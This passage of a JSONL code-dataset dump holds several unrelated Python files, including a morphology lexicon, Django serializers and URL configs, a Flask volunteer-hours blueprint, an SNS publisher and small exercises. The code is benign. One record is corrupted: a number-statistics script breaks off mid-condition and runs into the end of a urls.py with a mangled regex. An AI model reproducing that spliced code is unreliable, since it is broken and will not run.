nid\n","sub_path":"duckietown-world-venv/lib/python3.6/site-packages/reprep/repcontracts.py","file_name":"repcontracts.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"167296764","text":"# This is just part of documentation:\n# A signature is a tuple of strings (each an affix).\n# Signatures is a map: its keys are signatures. Its values are *sets* of stems.\n# StemToWord is a map; its keys are stems. 
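# (Illustrative aside, not from the original module: the SignatureToStems
# map described in this header can be built by inverting a StemToSig-style
# map; build_signature_to_stems is a hypothetical helper name.)
from collections import defaultdict

def build_signature_to_stems(stem_to_sig):
    # invert stem -> signature into signature -> set of stems
    signature_to_stems = defaultdict(set)
    for stem, sig in stem_to_sig.items():
        signature_to_stems[sig].add(stem)
    return dict(signature_to_stems)

# e.g. 'jump' and 'walk' share the NULL/ed/ing/s signature:
sig = ("NULL", "ed", "ing", "s")
assert build_signature_to_stems({"jump": sig, "walk": sig})[sig] == {"jump", "walk"}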
Its values are *sets* of words.\n# StemToSig is a map; its keys are stems. Its values are individual signatures.\n# WordToSig is a map; its keys are words. Its values are *lists* of signatures.\n# StemCounts is a map. Its keys are words. \t Its values are corpus counts of stems.\n# SignatureToStems is a dict: its keys are tuples of strings, and its values are dicts of stems.\n\nclass CWordList:\n    def __init__(self):\n        self.mylist = list()\n        print \"initializing the wordlist\"\n\n    def AddWord(self, word):\n        self.mylist.append(Word(word))\n\n    def at(self, n):\n        return self.mylist[n]\n\n    def sort(self):\n        self.mylist.sort(key=lambda item: item.Key)\n        # for item in self.mylist:\n        #\tprint item.Key\n        for i in range(len(self.mylist)):\n            word = self.mylist[i]\n            word.leftindex = i\n        templist = list()\n        for word in self.mylist:\n            thispair = (word.Key[::-1], word.leftindex)\n            templist.append(thispair)\n        templist.sort(key=lambda item: item[0])\n        for i in range(len(self.mylist)):\n            (drow, leftindex) = templist[i]\n            self.mylist[leftindex].rightindex = i\n\n    def PrintXY(self, outfile):\n        Size = float(len(self.mylist))\n        for word in self.mylist:\n            x = word.leftindex / Size\n            y = word.rightindex / Size\n            print >> outfile, \"{:20s}{:8.6}{:8.6}\".format(word.Key, x, y), \"hello\"\n\n\nclass CLexicon:\n    def __init__(self):\n        self.WordList = CWordList()\n        self.WordCounts = dict()\n\n        self.Signatures = dict()\n        self.SignatureToStems = {}\n        self.WordToSig = {}\n        self.StemToWord = {}\n        self.StemToAffix = {}\n        self.StemCounts = {}\n        self.StemToSig = {}\n        self.MinimumStemsInaSignature = 3\n        self.MinimumStemLength = 5\n        self.NumberOfAnalyzedWords = 0\n\n        self.LettersInAnalyzedWords = 0\n        self.NumberOfUnanalyzedWords = 0\n        self.LettersInUnanalyzedWords = 0\n        self.TotalLetterCountInWords = 0\n        self.LettersInStems = 0\n        self.AffixLettersInSignatures = 0\n\n        self.TotalRobustInSignatures = 0\n\n    def PrintWordList(self, outfile):\n        self.WordList.PrintXY(outfile)\n\n\nclass Word:\n    def __init__(self, key):\n        self.Key = key\n        self.leftindex = -1\n        self.rightindex = -1\n\n\ndef byWordKey(word):\n    return word.Key\n\n\nclass CSignature:\n    count = 0\n\n    def __init__(self):\n        self.Index = 0\n        self.Affixes = tuple()\n        self.StartStateIndex = CSignature.count\n        self.MiddleStateIndex = CSignature.count + 1\n        self.EndStateIndex = CSignature.count + 2\n        CSignature.count += 3\n\n    def Display(self):\n        returnstring = \"\"\n        affixes = list(self.Affixes)\n        affixes.sort()\n        return \"-\".join(affixes)\n\n    # ------------------------------------------------------------------------------------------##------------------------------------------------------------------------------------------#\n\n\nclass parseChunk:\n    def __init__(self, thismorph, rString, thisedge=None):\n        # print \"in parsechunk constructor, with \", thismorph, \"being passed in \"\n        self.morph = thismorph\n        self.edge = thisedge\n        self.remainingString = rString\n        if (self.edge):\n            self.fromState = self.edge.fromState\n            self.toState = self.edge.toState\n        else:\n            self.fromState = None\n            self.toState = None\n        # print self.morph, \"that's the morph\"\n        # print self.remainingString, \"that's the remainder\"\n\n    def Copy(self, otherChunk):\n        self.morph = otherChunk.morph\n        self.edge = otherChunk.edge\n        self.remainingString = otherChunk.remainingString\n\n    def Print(self):\n        returnstring = \"morph: \" + self.morph\n        if self.remainingString == \"\":\n            returnstring += \", no remaining string\"\n        else:\n            returnstring += \"remaining string is \" + self.remainingString\n        if self.edge:\n            
return \"-(\" + str(self.fromState.index) + \")\" + self.morph + \"(\" + str(\n self.toState.index) + \") -\" + \"remains:\" + returnstring\n else:\n return returnstring + \"!\" + self.morph + \"no edge on this parsechunk\"\n\n\n # ----------------------------------------------------------------------------------------------------------------------------#\n\n\nclass ParseChain:\n def __init__(self):\n self.my_chain = list()\n\n def Copy(self, other):\n for parsechunk in other.my_chain:\n newparsechunk = parseChunk(parsechunk.morph, parsechunk.remainingString, parsechunk.edge)\n self.my_chain.append(newparsechunk)\n\n def Append(self, parseChunk):\n # print \"Inside ParseChain Append\"\n self.my_chain.append(parseChunk)\n\n def Print(self, outfile):\n returnstring = \"\"\n columnwidth = 30\n for i in range(len(self.my_chain)):\n chunk = self.my_chain[i]\n this_string = chunk.morph + \"-\"\n if chunk.edge:\n this_string += str(chunk.edge.toState.index) + \"-\"\n returnstring += this_string + \" \" * (columnwidth - len(this_string))\n print >> outfile, returnstring,\n print >> outfile\n\n def Display(self):\n returnstring = \"\"\n for i in range(len(self.my_chain)):\n chunk = self.my_chain[i]\n returnstring += chunk.morph + \"-\"\n if chunk.edge:\n returnstring += str(chunk.edge.toState.index) + \"-\"\n return returnstring\n\n # ----------------------------------------------------------------------------------------------------------------------------#\n","sub_path":"ClassLexicon.py","file_name":"ClassLexicon.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"95837973","text":"class Movie:\n '''\n a class to store movie details fro api\n \n '''\n def __init__(self,id, title, overview, poster, vote_average, vote_count):\n self.id = id\n self.title = title\n self. 
overview = overview \n self.poster = 'https://image.tmdb.org/t/p/w500/'+ poster\n self.vote_average = vote_average\n self.vote_count = vote_count","sub_path":"app/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"20865932","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param two ListNodes\n # @return the intersected ListNode\n def getIntersectionNode(self, headA, headB):\n if not headA or not headB:\n return None\n currentA, currentB = headA, headB\n \n while True:\n if currentA == currentB:\n return currentA\n currentA, currentB = currentA.next, currentB.next\n if currentA == currentB:\n return currentA\n if not currentA:\n currentA = headB\n if not currentB:\n currentB = headA\n","sub_path":"testIntersection.py","file_name":"testIntersection.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204931748","text":"#enter a number or Enter to finish\n#count, sum, min, max, mean\n\n\nn = []\nsum = 0\nmin = None\nmax = None\n\nwhile True:\n try:\n cin=input(\"enter a number or Enter to finish >>> \")\n if not cin:\n break\n number=int(cin)\n n.append(number)\n sum=sum+number\n if min is None or min>number:\n min=number\n if max is None or max\\d+)/validate_schema/?$',\n DemoValidateViewFromSchema.as_view(),\n name='form_validation_schema'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^preview/(?P\\d+)/', FormPreview.as_view()),\n url(r'^forms/', include('demo.builder.urls', namespace='builder')),\n]\n","sub_path":"demo/demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"147413912","text":"# -*- coding: utf-8 -*-\n\"\"\"Story config.\n\"\"\"\n\n\n################################################################\n#\n# Sample:\n#\n# 1) PERSONS\n# 人物簡易設定\n# 2) CHARAS <- duplicated\n# 2) STAGES\n# 舞台基本設定\n# 3) DAYS\n# 年月日設定\n# 4) TIMES\n# 時間帯基本設定\n# 5) ITEMS\n# 小道具設定\n# 6) WORDS\n# 辞書設定\n#\n################################################################\n\n\nPERSONS = (\n # Tag / 氏,名 / 歳 / 性別 / 職業 / 呼称 / 紹介\n (\"sayumi\", \"沙由美\", \"葉山,沙由美\", 37, \"female\", \"事務職\", \"me:私:hiro:洋貴さん:michi:美知\"),\n (\"hiro\", \"洋貴\", \"大沢,洋貴\", 27, \"male\", \"ライター\", \"me:俺:sayumi:沙由美\", \"故人\"),\n (\"michi\", \"美知\", \"鈴本,美知\", 35, \"female\", \"花屋\", \"me:アタシ\"),\n (\"hase\", \"長谷川\", \"長谷川,直道\", 45, \"male\", \"義足技師\", \"me:僕\"),\n (\"take\", \"竹本\", \"竹本,雄太\", 28, \"male\", \"同僚\", \"me:オレ:hiro:大沢君\"),\n )\n\nCHARAS = (\n )\n\nSTAGES = (\n # Tag / 名前 / 紹介\n (\"Toyama\", \"富山県\", \"彼の地元\"),\n (\"mount1\", \"七乙斗山\", \"彼の地元の山\"),# NOTE: ベースは「八乙女山」\n (\"herhome\", \"沙由美の家\", \"マンション\"),\n (\"restaurant\", \"レストラン\", \"彼から大切な話があると待ち合わせたレストラン\"),\n (\"hospital\", \"病院\", \"彼が運ばれた病院\"),\n (\"leglabo\", \"義足工房\", \"紹介されて通っている義足技師の店\"),\n (\"histown\", \"斗賀野町\"),\n )\n\nDAYS = (\n # Tag / 名前 / 月 / 日 / 年\n (\"notforget\", \"彼を忘れられない\", 10,15, 2019),\n (\"artleg\", \"義足合わせの日\", 10,18, 2019),\n (\"visitsis\", \"妹の来た日\", 11,1, 2019),\n (\"knonwdeath\", \"彼の訃報を受けた日\", 11,10, 2009),\n (\"hisdeathday\", \"彼の命日\", 11,11, 2019),\n )\n\nTIMES = (\n # Tag / 名前 / 時 / 分\n (\"inmorning\", \"午前\", 10,0),\n (\"noon\", \"正午\", 12,0),\n (\"afternoon\", \"午後\", 14,0),\n 
(\"evening\", \"夕方\", 17,0),\n (\"night\", \"夜\", 20,0),\n )\n\nITEMS = (\n # Tag / 名前 / 紹介\n (\"pencil\", \"ボールペン\", \"彼が愛用していた\"),\n (\"pencase\", \"ペンケース\", \"彼が愛用していた\"),\n )\n\nWORDS = (\n # Tag / 名前 / 紹介\n )\n\n","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"633260329","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndf = pd.read_csv('wdbc.data',\n sep=',',\n header=None)\n\ndf.columns = ['id', 'diagnosis', 'mean radius', 'mean texture', 'mean perimeter', 'mean area',\n 'mean smoothness', 'mean compactness', 'mean concavity',\n 'mean concave points', 'mean symmetry', 'mean fractal dimension',\n 'radius error', 'texture error', 'perimeter error', 'area error',\n 'smoothness error', 'compactness error', 'concavity error',\n 'concave points error', 'symmetry error', 'fractal dimension error',\n 'worst radius', 'worst texture', 'worst perimeter', 'worst area',\n 'worst smoothness', 'worst compactness', 'worst concavity',\n 'worst concave points', 'worst symmetry', 'worst fractal dimension']\n\n\ndf.drop(['id', 'mean radius', 'mean perimeter', 'radius error', 'texture error', 'perimeter error', 'area error',\n 'smoothness error', 'compactness error', 'concavity error',\n 'concave points error', 'symmetry error', 'fractal dimension error',\n 'worst radius', 'worst texture', 'worst perimeter', 'worst area',\n 'worst smoothness', 'worst compactness', 'worst concavity',\n 'worst concave points', 'worst symmetry', 'worst fractal dimension'], axis = 1, inplace=True)\n\ndf_corr = df.corr()\ndf_hi_corr = df_corr[(df_corr > 0.5) & (df_corr < 1)]\n#print(df_hi_corr.to_string())\ndf['encoded_diagnosis'] = df['diagnosis'].map({'B': -1, 'M': 1})\ndf.drop('diagnosis', axis = 1, inplace=True)\n\n# print(df.to_string())\n\n# matplotlib\n\n# Figure 1: Bar\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.bar(np.arange(0, len(df['mean symmetry'])), df['mean symmetry'], color='y', label='mean symmetry')\naxes.set_title('Mean Symmetry')\naxes.set_xlabel('Index')\naxes.set_ylabel('Mean Symmetry')\naxes.legend()\nplt.show()\n\n\n# Figure 2: Histogram\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.hist(df['mean compactness'], color='b', label='mean symmetry')\naxes.set_title('Mean Compactness')\naxes.set_xlabel('Buckets')\naxes.set_ylabel('Mean Compactness')\naxes.legend()\nplt.show()\nplt.close()\n\n\n# Figure 3: Pie\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\nlabels = 'Begnin', 'Malignant'\naxes.pie(df['encoded_diagnosis'].value_counts(), labels=labels, autopct='%1.1f%%', shadow=True, startangle=90)\naxes.set_title('Diagnosis')\naxes.legend()\nplt.show()\nplt.close()\n\n\n\n# seaborn\nsns.set()\nsns.set_style('white') # ticks, darkgrid, whitegrid\n\n# Figure 4: Bar\n\nax = sns.barplot('encoded_diagnosis', 'mean area', data=df, estimator=np.mean, hue=df['encoded_diagnosis'])\nax.set(xlabel='Benign / Malignant', ylabel='Mean Area')\nplt.show()\nplt.close()\n\n# Figure 5: Box\nax = sns.boxplot('encoded_diagnosis', 'mean texture', data=df, palette='inferno')\nax.set(xlabel='Benign / Malignant', ylabel='Mean Concave Points')\nplt.show()\nplt.close()\n\n# Figure 6: Pair Plot\nsns.pairplot(df, hue='encoded_diagnosis', 
diag_kind='hist')\nplt.show()\nplt.close()\n\n\n\n","sub_path":"nov_5_2019/nov_5_2019_homework.py","file_name":"nov_5_2019_homework.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"143317043","text":"# Adapted from http://stackoverflow.com/questions/110803/dirty-fields-in-django\n\nfrom django.db.models.signals import post_save\n\n\nclass DirtyFieldsMixin(object):\n _original_state = None\n\n def __init__(self, *args, **kwargs):\n super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n self.start_dirty()\n\n def start_dirty(self):\n post_save.connect(\n reset_state, sender=self.__class__,\n dispatch_uid='{name}-DirtyFieldsMixin-sweeper'.format(\n name=self.__class__.__name__))\n reset_state(sender=self.__class__, instance=self)\n\n def _as_dict(self, check_relationship):\n all_field = {}\n\n for field in self._meta.fields:\n if field.rel:\n if not check_relationship:\n continue\n\n field_value = getattr(self, field.attname)\n all_field[field.name] = field.to_python(field_value)\n\n return all_field\n\n# def has_changed(self, field):\n# \"\"\"Returns ``True`` if field has changed from currently saved value\"\"\"\n# return getattr(self, field) != self._original_state[field]\n\n def get_dirty_fields(self, check_relationship=False):\n if not self._original_state:\n return {}\n\n # check_relationship indicates whether we want to check for foreign keys\n # and one-to-one fields or ignore them\n new_state = self._as_dict(check_relationship)\n all_modify_field = {}\n\n for key, value in new_state.items():\n original_value = self._original_state[key]\n if value != original_value:\n all_modify_field[key] = original_value\n\n return all_modify_field\n\n def is_dirty(self, check_relationship=False):\n # in order to be dirty we need to have been saved at least once, so we\n # check for a primary key and we need our dirty fields to not be empty\n if not self.pk or self._original_state is None:\n return True\n return {} != self.get_dirty_fields(check_relationship=check_relationship)\n\n\ndef reset_state(sender, instance, **kwargs):\n # original state should hold all possible dirty fields to avoid\n # getting a `KeyError` when checking if a field is dirty or not\n instance._original_state = instance._as_dict(check_relationship=True)\n\n\nclass LazyDirtyFieldsMixin(DirtyFieldsMixin):\n def __init__(self, *args, **kwargs):\n super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n","sub_path":"src/dirtyfields/dirtyfields.py","file_name":"dirtyfields.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482605019","text":"from __future__ import absolute_import, print_function, division\n\nimport datetime as dt\nfrom collections import namedtuple\n\nfrom .model import User, Message\n\nplanet_years = {\n 'Mercury': dt.timedelta(days=87.97),\n 'Venus': dt.timedelta(days=224.7),\n 'Earth': dt.timedelta(days=365.26),\n 'Mars': dt.timedelta(days=686.98),\n 'Jupiter': dt.timedelta(days=4332.71),\n 'Saturn': dt.timedelta(days=10759.5),\n 'Uranus': dt.timedelta(days=30685),\n 'Neptune': dt.timedelta(days=60190),\n}\n\nBirthdayEvent = namedtuple('BirthdayEvent', ['name', 'date', 'reason'])\n\ndef suffix(n):\n return str(n)+(\"th\" if 4<=n%100<=20 else {1:\"st\",2:\"nd\",3:\"rd\"}.get(n%10, \"th\"))\n\ndef round_nearest_up(num, nearest):\n num += nearest - num % nearest\n return num\n\ndef find_next(birthday):\n diff = 
dt.date.today() - birthday\n next_1000 = round_nearest_up(diff.days, 1000)\n return (birthday + dt.timedelta(days=next_1000)), next_1000\n\ndef calculate_birthday_events(birthday_events, name, birthday):\n today = dt.date.today()\n\n # Actual Birthday\n next_birthday = birthday.replace(year=today.year)\n if next_birthday < today:\n next_birthday = next_birthday.replace(year=today.year + 1)\n\n age = next_birthday.year - birthday.year\n\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=next_birthday,\n reason='{} birthday.'.format(suffix(age))))\n\n # n000th day birthday\n date, which_1000 = find_next(birthday)\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=date,\n reason='{}th day alive.'.format(which_1000)))\n\n # Birthdays on other planets\n age = today - birthday\n for planet, planet_year in planet_years.items():\n if planet == 'Earth':\n continue\n\n next_planet_age = int(age.total_seconds() / planet_year.total_seconds()) + 1\n next_birthday = next_planet_age * planet_year + birthday\n\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=next_birthday,\n reason='{} birthday on {}.'.format(suffix(next_planet_age), planet)))\n\n\ndef get_birthdays_message(session, chat_id):\n\n q = (\n session.query(User.full_name, User.id, User.birthday)\n .select_from(Message)\n .filter_by(chat_id=chat_id)\n .join(Message.from_)\n .filter(User.birthday.isnot(None))\n .distinct(User.id)\n )\n birthday_events = []\n\n for row in q:\n calculate_birthday_events(birthday_events, row.full_name, row.birthday)\n\n message = ''\n\n cutoff = dt.date.today() + dt.timedelta(days=60)\n\n lastdate = None\n\n birthday_events.sort(key=lambda x: x.date)\n for event in birthday_events:\n if event.date > cutoff:\n break\n\n if event.date == lastdate:\n message += '{}, {}\\n'.format(event.name, event.reason)\n else:\n lastdate = event.date\n if lastdate is not None:\n message += '\\n'\n message += '*{}*\\n'.format(event.date)\n message += '{}, {}\\n'.format(event.name, event.reason)\n\n return message\n","sub_path":"telegrambots/birthdays.py","file_name":"birthdays.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42880551","text":"def MinMax(temperaturas):\n print(\"A menor temperatura do mês foi: {} C.\".format(mínima(temperaturas)))\n print(\"A maior temperatura do mês foi: {} C.\".format(máxima(temperaturas)))\n\n\ndef mínima(temperaturas):\n min = temperaturas[0]\n for temp in temperaturas:\n if min > temp:\n min = temp\n return min\n\n\ndef máxima(temperaturas):\n max = temperaturas[0]\n for temp in temperaturas:\n if max < temp:\n max = temp\n return max\n\n##############################################################\n# TESTES TESTES TESTES TESTES TESTES #\n##############################################################\ndef teste(temps, min, max):\n info = '\\033[34m'\n clear = '\\033[m'\n\n sucesso = \"\\033[32m\" + \"Sucesso\" + clear\n erro = \"\\033[31m\" + \"Erro\" + clear\n\n print(info + \"\\nTemperaturas para teste:\" + clear)\n print(\"\\033[33m {} \\033[m\".format(temps))\n\n print(info + \"Teste mínima:\" + clear)\n min_obt = mínima(temps)\n print(\"valor esperado: {} valor obtido {} --» {}\".format(min,\n min_obt, sucesso if min == min_obt else erro))\n print(info + \"Teste máxima:\" + clear)\n max_obt = máxima(temps)\n print(\"valor esperado: {} valor obtido {} --» {}\".format(max,\n max_obt, sucesso if max == max_obt else erro))\n\n\ndef lista_de_testes():\n 
title = '\\033[7m'\n clear = '\\033[m'\n print(title + \"Iniciar testes\" + clear)\n temp = [0]\n teste(temp, 0, 0)\n\n temp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n teste(temp, 0, 0)\n\n temp = [30, 31, 35, 25, 26, 27, 34, 35, 29,\n 27, 28, 29, 24, 23, 22, 25, 26, 27, 28, 30]\n teste(temp, 22, 35)\n\n temp = [30, 31, 35, -2, 26, 27, -4, 35, 29, -\n 7, 28, 29, 24, 23, 22, 25, -6, 27, -8, 30]\n teste(temp, -8, 35)\n\n print(title + \"Teste finalizado\" + clear)\n\n\nlista_de_testes()\n","sub_path":"Coursera/Introdução à Ciencia da Computação com Python Parte 1/Semana 09/MinMax.py","file_name":"MinMax.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"500633577","text":"from rest_framework import serializers\nfrom .models import Profile\nfrom django.contrib.auth import get_user_model\n\n# from utils import create_email_update_token\n\n\nUser = get_user_model()\n\n\n# Send Basic Profile Data\nclass UserNameSerializer(serializers.ModelSerializer):\n \"\"\"\n We only want to send username for basic profile data along with other profile attributes\n \"\"\"\n\n class Meta:\n model = User\n fields = [\"username\"]\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n\n user = UserNameSerializer()\n\n class Meta:\n model = Profile\n fields = [\n \"profile_pic\",\n \"first_name\",\n \"last_name\",\n \"user\",\n \"bio\",\n \"number_of_followers\",\n \"number_of_followings\",\n ]\n\n # We are not sending id of the profile or user to prevent reverse mapping of user ID's to usernames\n # As user ID's are sent in JWT\n\n def update(self, instance, validated_data):\n \"\"\"\n Only non dangerous fields are updated here, as dangerous fields like user, email require their own validation\n \"\"\"\n\n instance.first_name = validated_data[\"first_name\"]\n instance.last_name = validated_data[\"last_name\"]\n instance.bio = validated_data[\"bio\"]\n instance.save()\n return instance\n\n\nclass ProfileDisplaySerializer(serializers.ModelSerializer):\n class Meta:\n model = Profile\n fields = [\n \"user__username\",\n \"profile_pic\",\n \"first_name\",\n \"last_name\",\n \"number_of_followers\",\n \"number_of_followings\",\n \"bio\",\n ]\n\n\n# Update Profile picture - Profile picture is handled separately\nclass ProfilePicUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n Separate endpoint for updating profile picture because submitting profile picture\n in a form along with other fields is not a good UX\n \"\"\"\n\n class Meta:\n model = Profile\n fields = [\"profile_pic\"]\n\n def update(self, instance, validated_data):\n print(f\"instance = {instance} \\n validated data = {validated_data} \")\n instance.profile_pic = validated_data[\"profile_pic\"]\n instance.save()\n return instance\n\n\nclass UsernameUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n An endpoint to update username. Since it requires it's own validation.\n it can be placed in non-dangerous fields with validation. 
    Keeping it separate also matters for the UX: if there is an error in\n    the username, the other fields will not be saved either.\n    \"\"\"\n\n    class Meta:\n        model = User\n        fields = [\"username\"]\n\n    def validate_username(self, username):\n        if (\n            username\n            and User.objects.filter(username=username)\n            .exclude(is_active=False)\n            .exists()\n        ):\n            raise serializers.ValidationError(\"Username already taken\")\n        return username\n\n    def update(self, instance, validated_data):\n        \"\"\"\n        Updates the username\n        \"\"\"\n\n        instance.username = validated_data[\"username\"]\n        instance.save()\n        return instance\n\n\n# Sends all confidential data like email; can only be accessed by the profile owner\nclass UserDetailSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = [\"username\", \"email\"]\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n\n    user = UserDetailSerializer()\n\n    class Meta:\n        model = Profile\n        fields = [\n            \"profile_pic\",\n            \"first_name\",\n            \"last_name\",\n            \"user\",\n            \"bio\",\n            \"number_of_followers\",\n            \"number_of_followings\",\n        ]\n","sub_path":"UserProfile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"358446029","text":"import os\nimport logging\nfrom sit.utils.aws.sns_service import SNSService\n\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_AWS_REGION = os.environ.get('AWS_DEFAULT_REGION', 'eu-west-1')\n\n\nclass Publisher(object):\n    def __init__(self, region=DEFAULT_AWS_REGION):\n        self.region = region\n\n        if self.region is None:\n            raise Exception(\"Publisher - Error - region missing\")\n\n    def publish(self, topic_arn, message, **kwargs):\n        published_message_id = None\n        logger.info('Publisher - publish - topic_arn: %s', topic_arn)\n        if topic_arn and message and kwargs:\n            event = {'Message': message, 'Args': kwargs}\n            sns_publisher = SNSService(topic_arn, self.region)\n            response = sns_publisher.publish_event(event)\n            if response and isinstance(response, dict):\n                published_message_id = response.get('MessageId')\n        else:\n            logger.info('Publisher - publish - Failure - Bad Params - topic_arn: %s', topic_arn)\n        return published_message_id\n","sub_path":"sit/utils/pubsub/publishers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"556796904","text":"from .forms import HoursEntryForm\nfrom .models import Volunteer, LoggedHours\nfrom .reports import AllVolunteersReport\nfrom flask import Blueprint, current_app, request, render_template, flash, session, redirect, url_for, g\nfrom modules.account.decorators import require_login, require_role, roles\nfrom modules.states.models import StatePosition\n\nvolunteer = Blueprint(\"volunteer\", __name__, template_folder=\"templates\", url_prefix=\"/volunteer\")\n\n@volunteer.route(\"/you/\")\n@require_login\ndef you():\n    directorships = [i.state.code for i in StatePosition.select().where(StatePosition.account == g.user, StatePosition.role == 99)]\n    return render_template(\"volunteer/profile.html\", volunteer=g.user.volunteer, fake=False, directorships=directorships)\n\n@volunteer.route(\"/all/\")\n@require_role(roles.hours_approver)\ndef all_volunteers():\n    report = AllVolunteersReport()\n    return render_template(\"volunteer/volunteers.html\", report=report)\n\n@volunteer.route(\"/hours/\")\n@require_login\ndef your_hours():\n    hours = 
g.user.volunteer.hours.order_by(LoggedHours.date.desc())\n    return render_template(\"volunteer/your_hours.html\", hours=hours)\n\n@volunteer.route(\"/hours/log/\", methods=[\"GET\", \"POST\"])\n@require_login\ndef log_hours():\n    form = HoursEntryForm(request.form)\n\n    if not form.validate_on_submit():\n        return render_template(\"volunteer/log_hours.html\", form=form)\n\n    LoggedHours.create(volunteer=g.user.volunteer, date=form.date.data,\n            description=form.description.data, category=form.category.data,\n            hours=form.hours.data, modifier=g.user)\n\n    flash(\"Your hours have been entered and should be approved shortly.\", \"info\")\n    return redirect(url_for(\"volunteer.your_hours\"))\n\n@volunteer.route(\"/hours/edit/<int:id>/\", methods=[\"GET\", \"POST\"])\n@require_login\ndef edit_hours(id):\n    form = HoursEntryForm(request.form)\n    obj = LoggedHours.get(id=id)\n\n    if not form.validate_on_submit():\n        form = HoursEntryForm(obj=obj)\n        return render_template(\"volunteer/log_hours.html\", form=form, editing=True)\n\n    form.populate_obj(obj)\n    obj.approved = 0\n    obj.modifier = g.user\n    obj.save()\n\n    return redirect(url_for(\"volunteer.your_hours\"))\n\n@volunteer.route(\"/hours/all/\")\n@require_role(roles.hours_approver)\ndef all_hours():\n    return render_template(\"volunteer/all_hours.html\", hours=LoggedHours.select().order_by(LoggedHours.date.desc()))\n\n@volunteer.route(\"/hours/approve/\", methods=[\"GET\", \"POST\"])\n@require_role(roles.hours_approver)\ndef approve_hours():\n    if request.method == \"GET\":\n        unapproved_hours = LoggedHours.select().where(LoggedHours.approved == 0).order_by(LoggedHours.date.desc())\n        return render_template(\"volunteer/unapproved_hours.html\", hours=unapproved_hours)\n    else:\n        hours = [int(k[5:]) for k in request.form.keys() if k.startswith(\"state\")]\n        approved = 0\n        denied = 0\n        for id in hours:\n            result = int(request.form[\"state{}\".format(id)])\n            # 0 -> do nothing, 1 -> approve, -1 -> reject\n            if result == 0:\n                continue\n            elif result == 1:\n                approved += 1\n            elif result == -1:\n                denied += 1\n            else:\n                raise Exception(\"Tried to set an hour's approved state to an invalid value -- this should never happen\")\n\n            entry = LoggedHours.get(LoggedHours.id == id)\n            entry.approved = result\n            entry.modifier = g.user\n            entry.save()\n\n        unapproved_hours = LoggedHours.select().where(LoggedHours.approved == 0).order_by(LoggedHours.date.desc())\n        flash(\"{} entries modified ({} approved, {} rejected).\".format(approved + denied, approved, denied), \"info\")\n        return render_template(\"volunteer/unapproved_hours.html\", hours=unapproved_hours)\n\n@volunteer.route(\"/hours/rejected/\", methods=[\"GET\", \"POST\"])\n@require_role(roles.hours_approver)\ndef rejected_hours():\n    if request.method == \"GET\":\n        rejected_hours = LoggedHours.select().where(LoggedHours.approved == -1).order_by(LoggedHours.date.desc())\n        return render_template(\"volunteer/rejected_hours.html\", hours=rejected_hours)\n    else:\n        hours = [int(k[5:]) for k in request.form.keys() if k.startswith(\"state\")]\n        deleted = 0\n        unrejected = 0\n        for id in hours:\n            result = int(request.form[\"state{}\".format(id)])\n            # 0 -> do nothing, 1 -> unreject, -1 -> delete forever\n\n            entry = LoggedHours.get(LoggedHours.id == id)\n\n            if result == 0:\n                continue\n            elif result == -1:\n                entry.delete_instance()\n                deleted += 1\n            elif result == 1:\n                entry.approved = 0\n                entry.modifier = g.user\n                entry.save()\n                unrejected += 1\n            else:\n                raise Exception(\"Tried to perform an undefined action on a rejected hours entry -- this should never happen\")\n\n        rejected_hours = LoggedHours.select().where(LoggedHours.approved == -1).order_by(LoggedHours.date.desc())\n        flash(\"{} entries modified ({} unrejected, {} deleted forever).\".format(unrejected + deleted, unrejected, deleted), \"info\")\n        return render_template(\"volunteer/rejected_hours.html\", hours=rejected_hours)\n","sub_path":"site/modules/volunteer/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
